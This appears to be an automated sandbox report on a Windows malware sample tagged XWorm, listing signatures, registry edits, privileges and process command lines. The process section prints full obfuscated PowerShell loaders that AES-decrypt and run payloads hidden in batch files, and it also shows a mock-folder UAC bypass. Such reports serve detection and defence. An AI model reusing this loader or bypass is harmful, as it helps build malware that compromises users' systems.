Malware Analysis Report

2024-11-16 13:40

Sample ID 240601-z4sfdsfb7v
Target https://mega.nz/file/xrFlTTIK#PgctUxnTsOXbi92OS9LkJFrER2LAlLj9E5V-Cd-yNiY
Tags
xworm evasion execution ransomware rat spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://mega.nz/file/xrFlTTIK#PgctUxnTsOXbi92OS9LkJFrER2LAlLj9E5V-Cd-yNiY was found to be: Known bad.

Malicious Activity Summary

xworm evasion execution ransomware rat spyware trojan

Detect Xworm Payload

Xworm

Contains code to disable Windows Defender

Modifies Windows Firewall

Disables Task Manager via registry modification

Stops running service(s)

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Disables RegEdit via registry modification

Loads dropped DLL

Executes dropped EXE

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops desktop.ini file(s)

Sets desktop wallpaper using registry

Launches sc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

NTFS ADS

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-01 21:16

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-01 21:16

Reported

2024-06-01 21:21

Platform

win11-20240426-en

Max time kernel

251s

Max time network

300s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/xrFlTTIK#PgctUxnTsOXbi92OS9LkJFrER2LAlLj9E5V-Cd-yNiY

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
(5 identical rows)

Xworm

trojan rat xworm

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
(24 identical rows)

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Disables Task Manager via registry modification

evasion

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\netsh.exe N/A

Stops running service(s)

evasion execution

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-2994005945-4089876968-1367784197-1000\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 72931.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\KLLauncher.bat:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Users\Admin\AppData\Local\Temp\SC.cmd\:SmartScreen:$DATA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\AppData\Local\Temp\SC.cmd\:Zone.Identifier:$DATA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
(6 identical rows)
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
(2 identical rows)
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
(2 identical rows)
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
(54 identical rows)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
(36 identical rows)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4152 wrote to memory of 3160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
(2 identical rows)
PID 4152 wrote to memory of 4920 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
(40 identical rows)
PID 4152 wrote to memory of 1500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
(2 identical rows)
PID 4152 wrote to memory of 568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
(20 identical rows)

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/xrFlTTIK#PgctUxnTsOXbi92OS9LkJFrER2LAlLj9E5V-Cd-yNiY

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff84c203cb8,0x7ff84c203cc8,0x7ff84c203cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4692 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5368 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3888 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004D0 0x00000000000004D8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4028 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3364 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\KLLauncher.bat" "

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JSdjfWSDJVO0vsFyBk+nB6C+eaYDe5c6Wed/quo44aM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nV7dP2kR9B3xk+WoLdi6HA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $eHWNi=New-Object System.IO.MemoryStream(,$param_var); $LEpVk=New-Object System.IO.MemoryStream; $YuKcK=New-Object System.IO.Compression.GZipStream($eHWNi, [IO.Compression.CompressionMode]::Decompress); $YuKcK.CopyTo($LEpVk); $YuKcK.Dispose(); $eHWNi.Dispose(); $LEpVk.Dispose(); $LEpVk.ToArray();}function execute_function($param_var,$param2_var){ $KsPcG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SLQNx=$KsPcG.EntryPoint; $SLQNx.Invoke($null, $param2_var);}$eXfZO = 'C:\Users\Admin\Downloads\KLLauncher.bat';$host.UI.RawUI.WindowTitle = $eXfZO;$bbfvj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eXfZO).Split([Environment]::NewLine);foreach ($aCusZ in $bbfvj) { if ($aCusZ.StartsWith('WzKRMLykmLUrjKyUnnlN')) { $ecFtX=$aCusZ.Substring(20); break; }}$payloads_var=[string[]]$ecFtX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"

C:\Windows \System32\ComputerDefaults.exe

"C:\Windows \System32\ComputerDefaults.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c call SC.cmd

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JSdjfWSDJVO0vsFyBk+nB6C+eaYDe5c6Wed/quo44aM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nV7dP2kR9B3xk+WoLdi6HA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $eHWNi=New-Object System.IO.MemoryStream(,$param_var); $LEpVk=New-Object System.IO.MemoryStream; $YuKcK=New-Object System.IO.Compression.GZipStream($eHWNi, [IO.Compression.CompressionMode]::Decompress); $YuKcK.CopyTo($LEpVk); $YuKcK.Dispose(); $eHWNi.Dispose(); $LEpVk.Dispose(); $LEpVk.ToArray();}function execute_function($param_var,$param2_var){ $KsPcG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SLQNx=$KsPcG.EntryPoint; $SLQNx.Invoke($null, $param2_var);}$eXfZO = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $eXfZO;$bbfvj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eXfZO).Split([Environment]::NewLine);foreach ($aCusZ in $bbfvj) { if ($aCusZ.StartsWith('WzKRMLykmLUrjKyUnnlN')) { $ecFtX=$aCusZ.Substring(20); break; }}$payloads_var=[string[]]$ecFtX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Crypt.bat" "

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ready.bat" "

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7pfv3IC7ad/h9x9L+91yRp6AnehvA4v4FJcPUx3O2HY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X+cU4l/F7fG8+16o5SCDLA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $IlaQt=New-Object System.IO.MemoryStream(,$param_var); $Ybcnm=New-Object System.IO.MemoryStream; $Evfbh=New-Object System.IO.Compression.GZipStream($IlaQt, [IO.Compression.CompressionMode]::Decompress); $Evfbh.CopyTo($Ybcnm); $Evfbh.Dispose(); $IlaQt.Dispose(); $Ybcnm.Dispose(); $Ybcnm.ToArray();}function execute_function($param_var,$param2_var){ $QSfby=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TSQnj=$QSfby.EntryPoint; $TSQnj.Invoke($null, $param2_var);}$kvOlG = 'C:\Users\Admin\AppData\Local\Temp\Crypt.bat';$host.UI.RawUI.WindowTitle = $kvOlG;$pTJta=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($kvOlG).Split([Environment]::NewLine);foreach ($oFaKJ in $pTJta) { if ($oFaKJ.StartsWith('ZkqIwJCzcVBaEdxxLCQj')) { $xIiOP=$oFaKJ.Substring(20); break; }}$payloads_var=[string[]]$xIiOP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e8muxl44QzFpbnkCrjQK7MgY3wLigHlewOA/sTi7P3M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xIHx7sG5Sgt6SDumHCsJWA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $anPTb=New-Object System.IO.MemoryStream(,$param_var); $dMvJM=New-Object System.IO.MemoryStream; $JXFgn=New-Object System.IO.Compression.GZipStream($anPTb, [IO.Compression.CompressionMode]::Decompress); 